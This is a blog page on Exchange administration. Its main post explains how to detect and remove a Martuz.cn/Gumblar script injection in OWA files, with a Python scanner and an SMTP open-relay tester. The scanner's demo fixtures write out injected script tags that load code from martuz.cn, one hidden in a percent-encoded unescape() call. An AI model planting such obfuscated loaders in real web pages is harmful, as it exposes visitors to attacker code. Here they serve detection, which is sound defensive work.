EmailTalk.org Blog

Martuz.cn / Gumblar exploit causing Microsoft Exchange 2003 OWA to run extremely slowly after login, and how to fix this problem.

5 June 2009  |  Filed under: Daily Roundup, MS Exchange Server

Martuz.cn / Gumblar exploit: root cause of the OWA problem

Symptoms of Microsoft Exchange 2003 Outlook Web Access and martuz.cn JavaScript virus infection
Within the last few days, Outlook Web Access on one of our main Exchange 2003 servers became painfully slow.   The main browser window in Internet Explorer would display just the vertical bar that separates the folders from the message area, get stuck there for about 30 seconds, and then finally load the rest of the page.   Double-clicking to open a message would pop open a blank message window with "http://yourservername…" in the lower left-hand status bar of the pop-up window, and after about 30 seconds the window would finally load.  The same thing happened when composing a new mail message in OWA.   Everything worked normally, except that tasks became slower for users in OWA.

Martuz.cn JavaScript virus infection detection
We are running the latest version of Symantec Norton Endpoint Security, which did not report any viruses, Trojans or spyware on the Exchange 2003 server.   Looking further into the situation, we noticed that when the Outlook Web Access browser window opened, the status bar would display "http://yourservername…", then change to "http://martuz.cn/vid/…" for a few seconds, and the OWA window would finally open.   This indicated some infection.   Our analysis showed that OWA was running infected JavaScript within the OWA pages, which caused the problem to appear.   Apparently Symantec Endpoint Security had no clue about this infection, and we are still unsure how the server got infected.  Googling and doing the research, we have seen reports attributing this infection to a PHP exploit or to an FTP exploit.

Martuz.cn JavaScript virus infection removal
First, check whether you have the same problem: log in to OWA and watch the message at the bottom left of the browser status bar after login. It should read "Waiting for http://yourservername/exchange". If at any point it changes to "Waiting for http://martuz.cn…" and then disappears, you have the same infection.
Download and install the Microsoft Forefront Client Security trial version on the server (we left Symantec Endpoint Security running at the same time without any problem).   For a quick check, scan only the Exchange installation folder on your server.    If the scan reports the Gumblar Trojan, your server is infected.   Infected files will be in \Exchsrvr\exchweb\controls and/or D:\Exchsrvr\exchweb\6.5.7651.60, or something similar.   Back up the entire exchweb folder just in case, but treat that backup as infected and keep it off any web server.  Choose the option to remove the infected files, then re-install the Exchange 2003 Service Pack, which re-populates the files the anti-virus software removed.   Two checks are worth doing before you call the server clean: confirm that none of the pages under exchweb still reference a host other than your own, and remember that whoever modified these files had write access to the server. Removing the injected script does not close that path, so change every credential that can write to the server (administrative, FTP or otherwise) and look at how the files were reached.
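The Forefront scan above relies on signatures. The check a practitioner wants alongside it is a content scan of the OWA web files for any script reference that points off the server, since that is exactly what the status bar was revealing. The following is an added example, not code from the original post: it walks a tree like \Exchsrvr\exchweb, reports every `<script src=...>` whose host is not one of your own, and also decodes percent-encoded payloads hidden inside `unescape()` calls, which is how this kind of injection commonly avoids leaving a literal `<script` string in the file. The sample files, the host name mail.example.com and the directory layout are constructed for the demo; the martuz.cn URL is taken only as far as the post shows it.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote, urlparse

# martuz.cn is the host this post saw in the OWA status bar; gumblar.cn was the
# earlier domain used by the same campaign.
KNOWN_BAD_HOSTS = {"martuz.cn", "gumblar.cn"}

# <script ... src=...> in any quoting style (double, single or unquoted).
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)
# unescape('...') payloads: injected tags are often percent-encoded inside one of
# these and emitted with document.write, so the literal "<script" never appears.
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", re.IGNORECASE)


def external_script_hosts(text, own_hosts):
    """Return [(host, url)] for every script src in text that points off-server.

    Relative src values and absolute URLs on own_hosts are normal OWA references
    and are ignored. Each unescape() payload is decoded and scanned as well, so a
    hidden tag is reported exactly like a literal one.
    """
    own = {h.lower() for h in own_hosts}
    chunks = [text] + [unquote(m.group(1)) for m in UNESCAPE_RE.finditer(text)]
    findings = []
    for chunk in chunks:
        for m in SCRIPT_SRC_RE.finditer(chunk):
            url = m.group(1)
            host = (urlparse(url).hostname or "").lower()
            if host and host not in own:
                findings.append((host, url))
    return findings


def scan_tree(root, own_hosts, suffixes=(".htm", ".html", ".js", ".asp", ".aspx")):
    """Walk root (e.g. the exchweb folder) and map each file with findings to them."""
    report = {}
    root = Path(root)
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="ignore")
            hits = external_script_hosts(text, own_hosts)
            if hits:
                report[path.relative_to(root).as_posix()] = sorted(hits)
    return report


def known_bad(report):
    """Subset of a scan_tree() report whose hosts are on the known-bad list."""
    return {f: h for f, h in report.items() if any(host in KNOWN_BAD_HOSTS for host, _ in h)}


def demo():
    """Constructed sample files (not real OWA pages): one clean, two infected."""
    with tempfile.TemporaryDirectory() as tmp:
        controls = Path(tmp) / "exchweb" / "controls"
        controls.mkdir(parents=True)
        # Legitimate relative reference, as OWA's own pages use.
        (controls / "clean.js").write_text(
            '<script type="text/javascript" src="/exchweb/controls/util.js"></script>\n')
        # Literal injected tag.
        (controls / "literal.htm").write_text(
            '<script src="http://martuz.cn/vid/"></script>\n')
        # Same tag, percent-encoded inside unescape() so "<script" never appears in the file.
        (controls / "hidden.js").write_text(
            "document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fmartuz.cn"
            "%2Fvid%2F%22%3E%3C%2Fscript%3E'));\n")
        return scan_tree(Path(tmp) / "exchweb", {"mail.example.com"})


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Run it against the real folder with `scan_tree(r"D:\Exchsrvr\exchweb", {"your.owa.hostname"})`; anything it reports after the service pack re-install means the cleanup is not finished.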

Summary:
Martuz.cn / Gumblar is a JavaScript injection that inserts itself into the legitimate OWA files, so every user who logs in has their browser fetch and run script from martuz.cn while the page loads; the wait on that remote fetch is what made OWA slow, and it also means the client machines that used OWA during the infection were exposed to attacker-controlled content.   There is no definite known cause of how this infection gets onto the server.   Microsoft Forefront Client Security seems to do a good job of detecting and removing it.  You need to re-install the service pack in order to re-introduce the files removed during the virus removal.

Common Mail Server Configuration Mistakes

24 December 2008  |  Filed under: MS Exchange Server

1. Installation on Unsupported Hardware

Unless there is a very good reason not to, always install Exchange on hardware supported by Microsoft.  Consult Microsoft’s Windows Server Catalog (formerly the “Hardware Compatibility List,” or HCL) for a complete list of compatible, supported hardware.  In order for a system to be considered supported, it must be listed in the Windows Server Catalog.  Systems containing some supported and some unsupported components are considered unsupported by Microsoft.  In addition to ensuring a smoother installation or upgrade, using supported hardware also means you will receive better technical support from Microsoft or other vendors should the need arise in the future.  Using unsupported hardware can cause problems ranging from intermittent mail outages to total loss of data.

2. Misconfigured DNS

Because Exchange relies heavily on both Active Directory and DNS, a simple configuration problem in either one will cause major headaches for your new or upgraded Exchange environment.  Here are a few of the common configuration mistakes when it comes to DNS and your Exchange environment:

Read more »

How to use RBL Servers to block Spam for Free on Mail Servers

18 December 2008  |  Filed under: MS Exchange Server

In this article we will discuss how to use RBL Servers to block Spam for Free on Mail Servers

First, what is an RBL? A Real-Time Block List (RBL), also called a DNS-based blocklist (DNSBL), is a DNS zone that lists the IP addresses of SMTP servers that either originate spam or are open relays. Open relays are one of the most common ways spam is sent: they are mail servers configured so that anyone on the Internet can hand them a message for any destination, which lets a spammer use them for mass mailings of effectively anonymous email.

Fortunately, you can use one of several RBL providers to reject, at the start of the SMTP session, any connection from a host that is listed as a spam source or open relay, before the message ever reaches a user’s inbox. The check is a DNS lookup of the connecting client’s IP address against one or more RBL zones.

Read more »

How to stop Exchange Server Relay

18 December 2008  |  Filed under: MS Exchange Server

If you’re a Microsoft Exchange server administrator, part of your job is to keep your organization free of spam.

Regardless of how much bandwidth your organization has, an Internet connection can only carry a finite amount of data in a given amount of time. If your connection is running at or near capacity, every junk e-mail message you receive delays legitimate messages until bandwidth frees up. Excessive spam also consumes disk space on the Exchange server. So it is imperative that you combat spam effectively.

The Microsoft Exchange Server Internet Mail Service may be configured as a publicly accessible mail relay (an open relay). In this configuration, outside users can use the Internet Mail Service as an agent for unsolicited commercial e-mail (UCE, or spam), flooding others with many copies of the same message, and your server’s IP address quickly ends up on the Real-Time Block Lists other sites use to reject mail.

To prevent this from happening, first make sure that the default SMTP relay restrictions have been applied to your Exchange 2003 servers, per Microsoft’s article on how to configure SMTP relay restrictions. If your Exchange server is still sending spam, disable all authentication methods except “anonymous” on your Internet-facing SMTP host. An anonymous connection can submit mail for your own recipients but is not allowed to relay. With Basic or Integrated Windows authentication left enabled on the Internet-facing host, any account whose password has been guessed or stolen can authenticate and then relay through you, because the default relay restrictions allow every authenticated computer to relay.

If outbound spam remains a problem, it is originating inside your network: a compromised account or an infected internal host. Consider resetting all passwords in your Exchange organization to regain control over SMTP relaying, or clear the “Allow all computers which successfully authenticate to relay, regardless of the list above” option on the Relay Restrictions tab.
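Whether the restrictions actually took effect is something to test from the outside rather than assume from the dialog box. The following is an added example, not code from the original post or from Microsoft's article: a minimal SMTP client that connects, says HELO, gives an external MAIL FROM and an external RCPT TO, and records whether the server answers 250 (it would relay) or 550 (it refuses), quitting without ever sending DATA so nothing is delivered even if the server is open. `FakeMailServer` is a constructed stand-in so the code runs offline; it is not a captured Exchange transcript, and the host names and addresses in it are made up. `probe()` runs the same test against a live server on port 25 and is meant only for servers you own.

```python
import socket


class SmtpSession:
    """Minimal SMTP client over a readable/writable pair; handles multi-line replies."""

    def __init__(self, rfile, wfile):
        self.rfile, self.wfile = rfile, wfile

    def reply(self):
        """Read one reply, collecting '250-...' continuation lines up to the '250 ...' line."""
        lines = []
        while True:
            raw = self.rfile.readline()
            if not raw:
                raise ConnectionError("server closed the connection")
            line = raw.decode("ascii", "replace").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":
                return int(line[:3]), lines

    def cmd(self, text):
        self.wfile.write((text + "\r\n").encode("ascii"))
        self.wfile.flush()
        return self.reply()


def relay_test(session, helo, mail_from, rcpt_to):
    """Return (looks_like_open_relay, transcript).

    mail_from and rcpt_to must both be in domains the tested server is NOT
    responsible for. DATA is never sent, so nothing is delivered even when the
    server is open. Exchange refuses relaying at RCPT TO with 550 5.7.1; some
    other MTAs defer the refusal to DATA, so for non-Exchange targets treat a
    250 here as a strong signal rather than proof.
    """
    transcript = []
    code, lines = session.reply()  # 220 banner
    transcript += lines
    for line in ("HELO %s" % helo, "MAIL FROM:<%s>" % mail_from):
        code, lines = session.cmd(line)
        transcript += lines
        if code != 250:
            raise RuntimeError("%s rejected: %s" % (line, lines[-1]))
    code, lines = session.cmd("RCPT TO:<%s>" % rcpt_to)
    transcript += lines
    transcript += session.cmd("QUIT")[1]
    return code == 250, transcript


def probe(host, rcpt_to, mail_from="probe@example.net", helo="probe.example.net", port=25, timeout=10):
    """Run relay_test against a live server. Only probe hosts you are responsible for."""
    with socket.create_connection((host, port), timeout) as sock:
        session = SmtpSession(sock.makefile("rb"), sock.makefile("wb"))
        return relay_test(session, helo, mail_from, rcpt_to)


class FakeMailServer:
    """Constructed server side for offline runs; not a captured Exchange transcript.

    Accepts any recipient when open_relay=True, otherwise only @local_domain,
    answering the way a locked-down Exchange does (550 5.7.1 Unable to relay).
    """

    def __init__(self, open_relay, local_domain="example.com"):
        self.open_relay, self.local_domain = open_relay, local_domain
        self.buf = b"220 mail.example.com ESMTP service ready\r\n"

    def write(self, data):
        verb, _, arg = data.decode("ascii").strip().partition(" ")
        if verb == "HELO":
            reply = "250 mail.example.com Hello [203.0.113.45]"
        elif verb == "MAIL":
            reply = "250 2.1.0 Sender OK"
        elif verb == "RCPT":
            addr = arg.split("<", 1)[1].rstrip(">")
            local = addr.lower().endswith("@" + self.local_domain)
            reply = "250 2.1.5 Recipient OK" if (local or self.open_relay) else "550 5.7.1 Unable to relay"
        elif verb == "QUIT":
            reply = "221 2.0.0 Service closing transmission channel"
        else:
            reply = "500 5.3.3 Unrecognized command"
        self.buf += (reply + "\r\n").encode("ascii")

    def flush(self):
        pass

    def readline(self):
        cut = self.buf.find(b"\n") + 1 or len(self.buf)
        line, self.buf = self.buf[:cut], self.buf[cut:]
        return line


def check(open_relay):
    """Drive relay_test against the fake server; returns (verdict, transcript)."""
    srv = FakeMailServer(open_relay)
    return relay_test(SmtpSession(srv, srv), "probe.example.net", "probe@example.net", "someone@other.example")


if __name__ == "__main__":
    for flag in (False, True):
        verdict, transcript = check(flag)
        print("open relay:", verdict, "| last reply:", transcript[-2])
```

Against a real host, `probe("mail.yourdomain.example", "you@some-other-domain.example")` should come back `False`; if it comes back `True`, the relay restrictions described above are not in effect on that interface.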

For more information, read Microsoft’s article, Stop Exchange Server SPAM from the inside by locking down SMTP.

MS Exchange 2007 Mailbox Server Storage Cost Calculator

12 November 2008  |  Filed under: Daily Roundup, MS Exchange Server

MSExchangeTeam.com has posted a very useful article about the Microsoft Exchange 2007 Mailbox Server Storage Cost Calculator.

In order to move forward with various designs like large mailboxes, IT departments need to understand one of the chief costs associated with Exchange mailbox servers, namely storage.  To that end, the Exchange 2007 Mailbox Storage Cost Calculator is designed to help you determine a portion of the mailbox server cost, namely the disk cost (purchase price and lifecycle power and cooling costs).  The calculator helps in two ways:

1. The calculator compares a series of storage design configurations and determines their respective costs.  The underlying goal here is two-fold:

   a. To show that you can achieve the same capacity and I/O requirements utilizing Small Form Factor SAS disks for relatively the same cost as Large Form Factor FC disks.

   b. To show that there are other disk solutions (e.g., SATA) that can be viable and reduce the disk footprint cost.

2. In the situation where you are unsure whether you want to deploy Single Copy Clusters (SCC) or Cluster Continuous Replication (CCR), the calculator can compare SCC+SAN disk configurations against CCR+DAS disk configurations from a cost perspective.

Read the full MS Exchange 2007 Storage Cost Calculator Article

Exchange 2007 Service Pack (SP) 1

12 November 2008  |  Filed under: Daily Roundup, MS Exchange Server

Microsoft recently released Exchange 2007 SP1. The Service Pack features improvements in the following areas: Client Access Improvements, Protection & Availability improvements, Transport Improvements, Mailbox Role Improvements, and Unified Messaging Improvements. ExchangeIS provides a detailed writeup of all of Exchange 2007 SP1’s features.

Exchange 2007 Mail Flow (DNS Records, Connectors and TLS)

12 November 2008  |  Filed under: Daily Roundup, MS Exchange Server

Elan Shudnow has written a detailed post on how you should configure DNS for Exchange 2007. Here’s the summary of his article:

A lot of people are confused as to how exactly you should configure DNS for Exchange 2007.  But this isn’t limited to DNS: how do you set up your Send Connectors and Receive Connectors, how do both connectors relate to DNS and the SMTP banner, and how do you allow your Connectors to advertise TLS to the outside world?

For Elan Shudnow’s complete explanation - which contains detailed screenshots and more, follow this link: Exchange Server 2007 Mail Flow.

MS Exchange Mail Server Troubleshooting Tips: When Email Doesn’t Come in From the Web

20 October 2008  |  Filed under: MS Exchange Server

This article will describe how an IT Administrator can easily troubleshoot a common problem: when emails don’t come in from the Web. We’ll show you how you can quickly test if the issue is related to your mail server, firewall, or DNS, allowing you to pinpoint the problem and get it fixed right away. Read more »

Common Exchange Server Configuration Mistakes - Open Relay Server Settings

27 September 2008  |  Filed under: MS Exchange Server

Having an open relay server is a death sentence for your organization. In today’s post, we’re going to make sure that your MS Exchange 2003 server is not configured as an open relay server - a common mistake that unfortunately is all too easy to make.

In this post, we’re going to talk about how to check and avoid making your server an open relay server. We’ll also point out a few tools to make sure your servers aren’t on Real Time Blacklists as a possible result of open relay server configurations. Read more »